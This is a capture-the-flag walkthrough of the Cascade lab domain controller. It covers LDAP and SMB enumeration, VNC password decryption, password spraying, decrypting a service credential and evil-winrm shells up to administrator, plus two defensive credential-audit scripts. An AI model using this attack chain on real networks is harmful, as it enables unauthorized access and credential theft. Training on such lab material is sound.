Cascade

Enumeration

As always, we start with the enumeration phase, scanning the machine for open ports and identifying the services and versions running behind them.

The following nmap command scans the target machine for open ports quickly and saves the output to a file:

nmap -sS --min-rate 5000 -p- -T5 -Pn -n 10.10.10.182 -oN allPorts

  • -sS use the TCP SYN scan option. This scan option is relatively unobtrusive and stealthy, since it never completes TCP connections.

  • --min-rate 5000 nmap will try to keep the sending rate at or above 5000 packets per second.

  • -p- scanning the entire port range, from 1 to 65535.

  • -T5 insane timing template, the fastest one nmap offers.

  • -Pn treat the host as online and skip host discovery.

  • -n scan without reverse DNS resolution.

  • -oN save the scan result to a file, in this case the allPorts file.

Now that we know which ports are open, let's identify the services and versions running on them. The following command scans these ports in more depth and saves the result to a file:

nmap -sC -sV -p53,88,135,139,389,445,636,3268,3269,5985,49154,49155,49157,49158,49170 10.10.10.182 -oN targeted

  • -sC performs the scan using the default set of scripts.

  • -sV enables version detection.

  • -oN save the scan result to a file, in this case the targeted file.

Judging by the open ports (Kerberos on 88, LDAP on 389/636 and the Global Catalog on 3268/3269), the machine is probably a domain controller, and crackmapexec confirms that the domain name is cascade.local.

crackmapexec smb 10.10.10.182

Let's add it to the /etc/hosts file.

nano /etc/hosts

We can also pull a list of domain users with a null-session rpcclient query, keeping only the usernames. The grep pattern must escape the square brackets, otherwise it is read as a bracket expression matching the literal characters . and *:

rpcclient -N -U '' 10.10.10.182 -c "enumdomusers" | grep -oP '\[.*\]' | awk '{print $1}' | tr -d "[]" > users

Exploitation

As port 389 is open, let's enumerate the DC via the LDAP service.

ldapsearch -H ldap://10.10.10.182 -x -b "DC=cascade,DC=local" '(objectClass=person)'

The r.thompson user has an attribute called cascadeLegacyPwd containing a base64-encoded password.

echo 'clk0bjVldmE=' | base64 -d; echo

Now we can check which SMB shares these credentials can access.

crackmapexec smb 10.10.10.182 -u 'r.thompson' -p 'rY4n5eva' --shares

We can read the Data share. Let's mount it on our local system.

mkdir /mnt/Data

mount -t cifs //10.10.10.182/Data /mnt/Data/ -o username=r.thompson,password=rY4n5eva,domain=cascade.local,rw

The Data share has a few files.

tree -fas /mnt/Data

The most interesting ones are Meeting_Notes_June_2018.html, which says that the TempAdmin user had the same password as the administrator:

cat /mnt/Data/IT/Email\ Archives/Meeting_Notes_June_2018.html

and the VNC Install.reg file, which appears to contain a hex-encoded password belonging to s.smith, judging by the directory it was left in.

cat /mnt/Data/IT/Temp/s.smith/VNC\ Install.reg

As it seems to be a VNC encrypted password, we can decrypt it with the following command I found here. VNC stores the password DES-encrypted under a fixed, publicly known key, which is the -K value below:

echo -n 6bcf2a4b6e5aca0f | xxd -r -p | openssl enc -des-cbc -nopad -nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

On OpenSSL 3 single DES has moved to the legacy provider, so if enc reports an unknown cipher, add -provider legacy -provider default before -des-cbc.
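The defensive counterpart of the step above is to find such files before someone else does: a registry export that carries a VNC Password value is a stored credential protected only by a fixed key. The following Python script, an added example that is not part of the original write-up, parses a .reg export and flags password-like hex values under any VNC key. The sample export is constructed: the key path follows TightVNC's layout, the 8-byte Password value is the one quoted above, and the ControlPassword value is made up to exercise the backslash line continuation regedit uses for long byte lists.

```python
import re

# Constructed sample in the format regedit exports (Windows Registry Editor 5.00).
# The TightVNC key path follows TightVNC's layout; the 8-byte Password value is
# the one quoted in the write-up, ControlPassword is made up to exercise the
# backslash line continuation regedit uses for long values.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server\Other]
"ControlPassword"=hex:aa,bb,cc,dd,\
  ee,ff,00,11
"""

SECTION_RE = re.compile(r'^\[(.+)\]$')
# "Name"=hex:..  or typed variants such as "Name"=hex(2):..
HEX_VALUE_RE = re.compile(r'^"([^"]+)"=hex(?:\([0-9a-fA-F]+\))?:(.*)$')
PASSWORD_NAME_RE = re.compile(r'pass|pwd', re.IGNORECASE)

def load_reg(path):
    """Read a .reg file from disk: regedit writes UTF-16LE with a BOM,
    hand-written or older exports are plain ASCII."""
    with open(path, 'rb') as fh:
        data = fh.read()
    if data.startswith(b'\xff\xfe'):
        return data.decode('utf-16')
    return data.decode('utf-8', 'replace')

def parse_reg_hex_values(text):
    """Return (key_path, value_name, bytes) for every hex value in the export."""
    lines = text.splitlines()
    results, section, i = [], None, 0
    while i < len(lines):
        line = lines[i].strip()
        i += 1
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1)
            continue
        m = HEX_VALUE_RE.match(line)
        if not m or section is None:
            continue
        name, data = m.group(1), m.group(2).strip()
        # regedit wraps long byte lists: trailing backslash, continued on the next line
        while data.endswith('\\') and i < len(lines):
            data = data[:-1] + lines[i].strip()
            i += 1
        raw = bytes(int(h, 16) for h in data.split(',') if h.strip())
        results.append((section, name, raw))
    return results

def find_vnc_passwords(text):
    """Password-like hex values under any key whose path mentions VNC."""
    return [(key, name, raw.hex())
            for key, name, raw in parse_reg_hex_values(text)
            if 'vnc' in key.lower() and PASSWORD_NAME_RE.search(name)]

if __name__ == '__main__':
    for key, name, value in find_vnc_passwords(SAMPLE_REG):
        print(f'{key}\\{name} = {value}')
```

Run it over exports collected from file shares (load_reg handles the UTF-16 encoding regedit writes) and treat every hit as a credential that needs rotating, since the DES key that protects it is the same on every VNC install.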

We have a password, but we don't know whose user it is. Let's password-spray it across all the users we found earlier.

crackmapexec smb 10.10.10.182 -u users -p 'sT333ve2'

The password is valid for the s.smith user, who must be a member of the Remote Management Users group, because we can get a shell with evil-winrm and take the user flag.

evil-winrm -i 10.10.10.182 -u 's.smith' -p 'sT333ve2'

Privilege Escalation

s.smith has access to one more share on the SMB server, called Audit$.

crackmapexec smb 10.10.10.182 -u 's.smith' -p 'sT333ve2' --shares

Let's mount it to our local system.

mkdir /mnt/Audit$

mount -t cifs //10.10.10.182/Audit$ /mnt/Audit$/ -o username=s.smith,password=sT333ve2,domain=cascade.local,rw

The share holds what seem to be the files the CascAudit.exe binary needs in order to run.

tree -fas /mnt/Audit$/

There is one .db file, which is an SQLite 3 database.

file /mnt/Audit$/DB/Audit.db

The database has three tables, and the Ldap table holds a base64-encoded password for the ArkSvc user.

sqlite3 /mnt/Audit$/DB/Audit.db

But decoding it only yields binary data, so the password is encrypted rather than just encoded.

echo 'BQO5l5Kj9MdErXx6Q6AGOw==' | base64 -d; echo
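The two base64 strings found so far behave differently once decoded: the cascadeLegacyPwd attribute decodes to printable text (the value was merely encoded), while the Ldap table value decodes to 16 opaque bytes, exactly one AES block. The following Python script, an added example that is not part of the original write-up, turns that observation into a small audit for both places such values turn up: it reads LDIF output and walks an SQLite database, flags attributes or columns whose names look credential-related, and classifies each base64 value as plaintext, block-aligned ciphertext or other binary. The attribute name cascadeLegacyPwd, the table name Ldap and the two base64 values are from this page; the DNs, the description attribute, the Audit.db column names and the credential-name patterns are constructed assumptions.

```python
import base64
import binascii
import re
import sqlite3

# Constructed LDIF in the shape of the ldapsearch output described in the write-up.
# cascadeLegacyPwd and its value are the ones quoted there; the DNs and the
# description attribute are made up.
SAMPLE_LDIF = """\
dn: CN=Ryan Thompson,DC=cascade,DC=local
sAMAccountName: r.thompson
description: legacy account
cascadeLegacyPwd: clk0bjVldmE=

dn: CN=Steve Smith,DC=cascade,DC=local
sAMAccountName: s.smith
"""

# Attribute or column names that suggest a stored credential (assumed patterns).
CRED_NAME_RE = re.compile(r'pwd|pass|secret|cred', re.IGNORECASE)

def classify_b64(value):
    """Decode a base64 string and report what the bytes look like: (kind, detail).
    plaintext        printable ASCII, so the value was merely encoded; detail is the text
    block-ciphertext opaque bytes whose length is a multiple of 16 (the AES block size)
    binary           opaque bytes of any other length
    not-base64       the value does not decode
    """
    try:
        raw = base64.b64decode(value, validate=True)
    except (binascii.Error, ValueError):
        return ('not-base64', None)
    if raw and all(32 <= b < 127 for b in raw):
        return ('plaintext', raw.decode('ascii'))
    if raw and len(raw) % 16 == 0:
        return ('block-ciphertext', len(raw))
    return ('binary', len(raw))

def _unwrap(entry):
    # LDIF writes non-ASCII-safe values as 'attr:: <base64>'; that is transport
    # wrapping, distinct from a base64 value actually stored in the directory
    for attr, vals in entry.items():
        entry[attr] = [base64.b64decode(v[1:].strip()).decode('utf-8', 'replace')
                       if v.startswith(':') else v for v in vals]
    return entry

def parse_ldif(text):
    """Minimal LDIF reader: blank-line separated entries, ' ' continuation lines."""
    entries, current, last = [], {}, None
    for line in text.splitlines():
        if not line.strip():
            if current:
                entries.append(_unwrap(current))
            current, last = {}, None
        elif line.startswith(' ') and last:
            current[last][-1] += line[1:]
        elif not line.startswith('#'):
            attr, _, val = line.partition(':')
            current.setdefault(attr, []).append(val.strip())
            last = attr
    if current:
        entries.append(_unwrap(current))
    return entries

def audit_ldif(text):
    """(account, attribute, kind, detail) for every credential-looking attribute."""
    findings = []
    for entry in parse_ldif(text):
        account = entry.get('sAMAccountName', entry.get('dn', ['?']))[0]
        for attr, values in entry.items():
            if CRED_NAME_RE.search(attr):
                findings += [(account, attr) + classify_b64(v) for v in values]
    return findings

def _quote(ident):
    # SQLite identifier quoting for table/column names read from the database itself
    return '"' + ident.replace('"', '""') + '"'

def audit_sqlite(conn):
    """(table, column, kind, detail) for every credential-looking text column."""
    findings = []
    tables = [r[0] for r in conn.execute("SELECT name FROM sqlite_master WHERE type='table'")]
    for table in tables:
        for col in [r[1] for r in conn.execute(f'PRAGMA table_info({_quote(table)})')]:
            if not CRED_NAME_RE.search(col):
                continue
            for (val,) in conn.execute(f'SELECT {_quote(col)} FROM {_quote(table)}'):
                if isinstance(val, str):
                    findings.append((table, col) + classify_b64(val))
    return findings

def sample_audit_db():
    """In-memory stand-in for Audit.db: an Ldap table holding the base64 value
    quoted in the write-up; the column names are constructed."""
    conn = sqlite3.connect(':memory:')
    conn.execute('CREATE TABLE Ldap (id INTEGER, uname TEXT, pwd TEXT, domain TEXT)')
    conn.execute("INSERT INTO Ldap VALUES (1, 'ArkSvc', 'BQO5l5Kj9MdErXx6Q6AGOw==', 'cascade.local')")
    return conn
```

Point audit_ldif at a full ldapsearch dump and audit_sqlite at any application database found on a share (sqlite3.connect on the file): a plaintext finding is a credential stored in the clear, while a block-ciphertext finding means the key lives somewhere nearby, typically in the application that wrote the row, which is exactly what the CascAudit.exe analysis below goes looking for.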

Let's decompile the CascAudit.exe binary with dotPeek and see what it does. Transfer CascAudit.exe and CascCrypto.dll to a Windows machine with dotPeek installed, and open both files with it.

The CascAudit.exe source code has a key that seems to be used to encrypt and decrypt passwords.

On the other hand, the CascCrypto.dll source code shows that the passwords are encrypted with AES-CBC using a hard-coded IV.

We can use an online tool such as devglan.com to decrypt the encrypted password we found in the database using the IV and the secret key; any local AES-CBC implementation works just as well and avoids pasting the key and ciphertext into a third-party site.

Let's use these credentials to get a shell as arksvc.

evil-winrm -i 10.10.10.182 -u 'arksvc' -p 'w3lc0meFr31nd'

As we can see, the arksvc user is a member of the AD Recycle Bin group, which means it has permission to read deleted AD objects.

net user arksvc

Let's list the deleted AD objects with the following command. Among them is a base64-encoded password for the TempAdmin user.

Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *

Decode the base64 string to get the password.

echo 'YmFDVDNyMWFOMDBkbGVz' | base64 -d; echo

If you remember, the meeting notes in the Data share said that the TempAdmin user's password was the same as the administrator's. So we can get a shell as administrator, and then all we have to do is reap the harvest and take the root flag.

evil-winrm -i 10.10.10.182 -u 'administrator' -p 'baCT3r1aN00dles'
